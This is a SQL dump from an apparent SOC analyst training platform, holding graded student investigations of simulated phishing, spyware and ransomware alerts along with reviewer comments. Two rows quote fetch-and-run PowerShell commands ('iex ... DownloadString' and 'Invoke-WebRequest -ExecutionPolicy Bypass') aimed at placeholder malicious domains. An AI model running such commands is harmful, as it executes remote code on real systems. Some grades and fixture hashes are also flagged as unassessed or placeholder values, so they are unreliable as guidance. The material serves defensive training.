(589, 232, 246, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The sender IP is known for phising attacks \",\"artifacts\":\"Raw Log Evidence {\\\"timestamp\\\":\\\"2023-10-05T09:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.10\\\",\\\"email_sender\\\":\\\"phisher@example.com\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\",\\\"username\\\":\\\"asmith\",\"analysis_answers\":{\"action_taken\":\"The sender IP is known for phising attacks \",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T18:12:05.270Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 21:13:11', '2026-03-15 18:05:11', '2026-03-15 18:14:00', 0, NULL),
(590, 232, 249, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"It shows that someone is trying to. Execute code via powershell and there is from attacker\",\"artifacts\":\"{\\\"log_type\\\":\\\"process_creation\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:09Z\\\",\\\"hostname\\\":\\\"Corporate-Laptop-04\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"powershell.exe\\\",\\\"cmdline\\\":\\\"powershell -nop -c \\\\\\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\\\\\\"\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"parent_process\\\":\\\"explorer.exe\\\",\\\"parent_process_id\\\":4821,\\\"process_id\\\":9342,\\\"integrity_level\\\":\\\"High\\\",\\\"network_activity\\\":[{\\\"protocol\\\":\\\"HTTP\\\",\\\"dest_ip\\\":\\\"192.168.1.105\\\",\\\"dest_port\\\":80,\\\"url\\\":\\\"http://maliciousdomain.com/script.ps1\\\"}]}\",\"analysis_answers\":{\"action_taken\":\"It shows that someone is trying to. Execute code via powershell and there is from attacker\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T18:19:16.158Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-15 21:23:41', '2026-03-15 18:14:41', '2026-03-15 18:20:00', 0, NULL),
(591, 283, 304, 'investigating', NULL, NULL, NULL, NULL, '2026-03-15 22:21:10', '2026-03-15 19:11:10', '2026-03-15 19:11:10', 0, NULL),
(592, 283, 1532, 'graded', 94, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.2.15\",\"hash-a9f5b3c7\",\"domain-https://mali\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:17:24\\nALERT: Initial Access via Zero-Click iCloud Calendar Exploit [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.2.15\\n- [HASH] a9f5b3c7e812f3d6b7e695f6c29e1e4f\\n- [DOMAIN] https://malicious-calendar-invite.com/icalendar\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:17:28.671Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:07:37', '2026-03-15 20:17:28', 0, NULL),
(593, 283, 1533, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:25:45\\nALERT: Execution of REIGN Spyware on iOS [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] 8f14e45fceea167a5a36dedd4bea2543\\n- [FILENAME] reign_install.pkg\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:25:56.678Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:17:28', '2026-03-15 20:25:56', 0, NULL),
(594, 283, 1534, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.15\",\"hash-46b7f3c5\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:32:26\\nALERT: Establishing Persistence on iOS Devices [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.15\\n- [HASH] 46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\n- [FILENAME] malicious_profile.mobileconfig\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:32:32.163Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:25:56', '2026-03-15 20:32:32', 0, NULL),
(595, 283, 1535, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:35:15\\nALERT: Lateral Movement to Connected iCloud Services [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [USERNAME] compromisedUser@icloud.com\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:35:15.966Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:32:32', '2026-03-15 20:35:15', 0, NULL),
(596, 283, 1536, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.3.15\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"escalate\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:36:09\\nALERT: Exfiltration of Sensitive Data to External Servers [OP: Quadream REIGN Spyware Investigation Training]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.3.15\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] classified_data.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:36:10.227Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:35:15', '2026-03-15 20:36:10', 0, NULL),
(597, 283, 1601, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.1.15.32\",\"hash-3f5cfc5b\",\"domain-http://malic\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:41:38\\nALERT: Initial Access: Phishing Email Detected [OP: Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.1.15.32\\n- [HASH] 3f5cfc5b1b7d4c7a9f4e1b4c4e5a4e9b\\n- [DOMAIN] http://malicious-site.com/benefits-update\\n- [EMAIL] hr-support@fakesite.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:41:39.227Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:39:12', '2026-03-15 20:41:39', 0, NULL),
(598, 283, 1602, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_2\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:43:15\\nALERT: Execution: Fileless PowerShell Activity [OP: Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri http://malicious-domain.com/payload -OutFile $null\\n- [USERNAME] jdoe\\n- [DOMAIN] malicious-domain.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:43:16.194Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:41:39', '2026-03-15 20:43:16', 0, NULL),
(599, 283, 1603, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.104.68.132\",\"hash-d41d8cd9\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15.03.2026, 23:44:54\\nALERT: Persistence: Scheduled Task Creation [OP: Advanced Fileless Ransomware Investigation: NetWalker in Healthcare & Education]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 193.104.68.132\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T20:44:55.495Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 20:43:16', '2026-03-15 20:44:55', 0, NULL),
(600, 283, 1604, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-15 20:44:55', '2026-03-15 20:44:55', 0, NULL),
(601, 28, 268, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_3\",\"artifact_1\",\"ip-203.0.113.45\",\"ip-192.168.1.100\",\"ip-10.0.0.15\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/3/2026, 10:12:14 μ.μ.\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T21:12:22.301Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 21:09:16', '2026-03-15 21:12:22', 0, NULL),
(602, 28, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/3/2026, 10:14:02 μ.μ.\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T21:14:03.868Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"block_ip\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 21:12:22', '2026-03-15 21:14:03', 0, NULL);
--
-- `investigations` rows 603-607. Earlier rows of this table are in the INSERT
-- that ends just above; the column list is repeated because the dump splits
-- large tables into several INSERT statements.
--
-- Column notes grounded in the visible rows:
--   * `executive_summary` / `ai_summary` are JSON stored as text. Playbook V2
--     rows (603) hold the artifact/action ids the analyst ticked plus an
--     auto-generated conclusion; legacy V1 rows (605-607) hold the analyst's
--     free text and a pasted `artifacts` string verbatim.
--   * The `DATE:` inside the V2 conclusion is formatted by the client in the
--     user's locale (row 603 shows Greek "μ.μ."); use `submitted_at` /
--     `updated_at` for any time-based logic, not that string.
--   * Legacy rows 605 and 606 are `graded` 100 with `verdict_correctness`
--     "N/A" and feedback "Legacy investigation (V1) complete": full marks
--     appear to be granted without assessing the content. NOTE(review):
--     confirm this is intended before such grades feed leaderboards or
--     certificates.
--   * Row 607 is still `submitted` (grade and `ai_summary` NULL) with an
--     `ai_evaluation_scheduled_at` set; it is waiting for evaluation.
--   * Row 603 lists "3fa85f64-5717-4562-b3fc-2c963f66afa6" under [HASH]; that
--     is a UUID, not a digest, so the alert fixture appears to mislabel it.
--     Row 606 cites d41d8cd98f00b204e9800998ecf8427e, the MD5 of empty input,
--     as the malicious file hash - a placeholder value that students should
--     not be taught to "block" in real life.
--   * All of this text is user-supplied. Whatever renders it (dashboards,
--     reports) must escape it for the output context, and whatever feeds it
--     to an AI evaluator must treat it as untrusted prompt content.
--     NOTE(review): that code is not part of this dump.
--
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(603, 28, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/3/2026, 10:15:04 μ.μ.\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T21:15:06.766Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-15 21:14:03', '2026-03-15 21:15:06', 0, NULL),
(604, 214, 1591, 'investigating', NULL, NULL, NULL, NULL, '2026-03-16 04:55:28', '2026-03-16 01:46:28', '2026-03-16 01:46:28', 0, NULL),
(605, 225, 243, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"An attacker attempted username and password guessing 45 times. This indicates an intent to brute force RDP. This is highly malicious because connection was established, but both country and region are unknown.\",\"artifacts\":\"192.168.1.25, 10.0.0.4\",\"analysis_answers\":{\"action_taken\":\"An attacker attempted username and password guessing 45 times. This indicates an intent to brute force RDP. This is highly malicious because connection was established, but both country and region are unknown.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T03:06:13.182Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-16 06:06:05', '2026-03-16 02:59:05', '2026-03-16 03:07:00', 0, NULL),
(606, 225, 304, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"This is a spear phishing email. It contains malicious file. The URL is using port 80 and not the secured version HTTPS, which uses port 443. This indicates that the attacker wants to steal the user credentials. This suspicious email is true positive.\",\"artifacts\":\"Q3_Report.docm, d41d8cd98f00b204e9800998ecf8427e, 203.0.113.45, 192.168.1.25, http://maliciousdomain.com/securelogin, finance.partner@maliciousdomain.com, john.doe@company.com\",\"analysis_answers\":{\"action_taken\":\"This is a spear phishing email. It contains malicious file. The URL is using port 80 and not the secured version HTTPS, which uses port 443. This indicates that the attacker wants to steal the user credentials. This suspicious email is true positive.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T03:18:07.469Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-16 06:17:29', '2026-03-16 03:07:29', '2026-03-16 03:19:00', 0, NULL),
(607, 225, 303, 'submitted', NULL, NULL, '{\"verdict\":\"True Positive\",\"executive_summary\":\"The sender\'s email has a typo. The spelling is \\\"trusfed\\\" instead of \\\"trusted\\\". That misspelling is already highly suspicious. The URL is using port 80 (HTTP) which is not secured. This indicates that the attacker is stealing user credentials. Therefore, this email is a phishing email.\",\"artifacts\":\"198.51.100.23, 192.168.1.45, http://malicious-link.example.com, admin@trusfed-business.com, asmith, email-server\",\"analysis_answers\":{\"action_taken\":\"The sender\'s email has a typo. The spelling is \\\"trusfed\\\" instead of \\\"trusted\\\". That misspelling is already highly suspicious. The URL is using port 80 (HTTP) which is not secured. This indicates that the attacker is stealing user credentials. Therefore, this email is a phishing email.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T03:27:16.741Z\"}', NULL, '2026-03-16 06:29:06', '2026-03-16 03:19:06', '2026-03-16 03:27:16', 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `investigation_notes`
--

--
-- Free-form analyst notes attached to an alert.
--
-- No PRIMARY KEY, AUTO_INCREMENT or FOREIGN KEY appears in this CREATE
-- statement. NOTE(review): phpMyAdmin dumps usually add keys in a later
-- "Indexes for dumped tables" section that is outside this chunk; confirm
-- `id` receives a PK there and that (`user_id`, `alert_id`) is at least
-- indexed, since notes will be looked up per user and alert.
--
CREATE TABLE `investigation_notes` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,  -- author; same id space as `investigations.user_id` (no FK declared here)
  `alert_id` int(11) NOT NULL,  -- alert the note belongs to; same id space as `investigations.alert_id` (no FK declared here)
  `note` text NOT NULL,  -- user-supplied free text: escape for the output context when rendered, never emit as raw HTML
  `created_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `learning_paths`
--

--
-- Catalogue of learning paths shown to students (the dumped rows follow in
-- the INSERT below).
--
-- No PRIMARY KEY or FOREIGN KEY is declared here. NOTE(review): phpMyAdmin
-- normally emits them in a later section outside this chunk - verify `id` is
-- keyed and `prerequisite_path_id` is constrained to `learning_paths`.`id`.
--
CREATE TABLE `learning_paths` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `difficulty_level` enum('beginner','intermediate','advanced') NOT NULL,
  `estimated_hours` int(11) DEFAULT 0,  -- 0 doubles as "not estimated" (see id 9 in the dumped rows)
  `icon_url` varchar(255) DEFAULT NULL,  -- NOTE(review): if editable through an admin UI, restrict to http(s) URLs before it is placed in an <img src> or href
  `display_order` int(11) DEFAULT 0,  -- not unique: the dumped rows repeat 3 and 6, so ORDER BY display_order needs a tie-breaker such as id
  `is_active` tinyint(1) DEFAULT 1,  -- soft on/off switch; inactive paths are presumably hidden rather than deleted
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `prerequisite_path_id` int(11) DEFAULT NULL  -- self-reference to the path that must be completed first; NULL in every dumped row = no prerequisite
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `learning_paths`
--

--
-- Dumped `learning_paths` rows. Observations on the data itself:
--   * ids 5, 7, 8 and 10 are absent (deleted or never created - not
--     determinable from the dump).
--   * `display_order` collides: ids 3 and 9 both use 3, ids 6 and 12 both
--     use 6, so the UI ordering of those pairs is undefined unless the query
--     adds a secondary sort key.
--   * id 9 has `estimated_hours` 0, apparently meaning "not estimated".
--   * `prerequisite_path_id` is NULL everywhere, so nothing gates progression
--     between paths at the data level.
--
INSERT INTO `learning_paths` (`id`, `title`, `description`, `difficulty_level`, `estimated_hours`, `icon_url`, `display_order`, `is_active`, `created_at`, `updated_at`, `prerequisite_path_id`) VALUES
(1, 'Pre-Security Fundamentals', 'Start your cybersecurity journey with essential IT and security foundations. Perfect for absolute beginners.', 'beginner', 120, NULL, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(2, 'Security Operations Basics', 'Build practical security operations skills with hands-on log analysis, packet inspection, and threat detection.', 'intermediate', 180, NULL, 2, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18', NULL),
(3, 'SOC Analyst Level 1', 'Master SIEM platforms, incident response, and become job-ready for SOC Analyst roles.', 'intermediate', 220, NULL, 3, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18', NULL),
(4, 'Advanced SOC & Threat Hunting', 'Advanced threat hunting, malware analysis, and specialized security operations.', 'advanced', 160, NULL, 4, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18', NULL),
(6, 'Threat Intelligence', 'Master the art of Cyber Threat Intelligence (CTI). Learn to collect, analyze, and disseminate intelligence to anticipate and prevent attacks.', 'intermediate', 40, NULL, 6, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44', NULL),
(9, 'Alert Investigation Specialist', 'Master the art of investigating specific security alerts. Deep dive into EDR, SIEM, Network, and Email analysis tools.', 'beginner', 0, NULL, 3, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30', NULL),
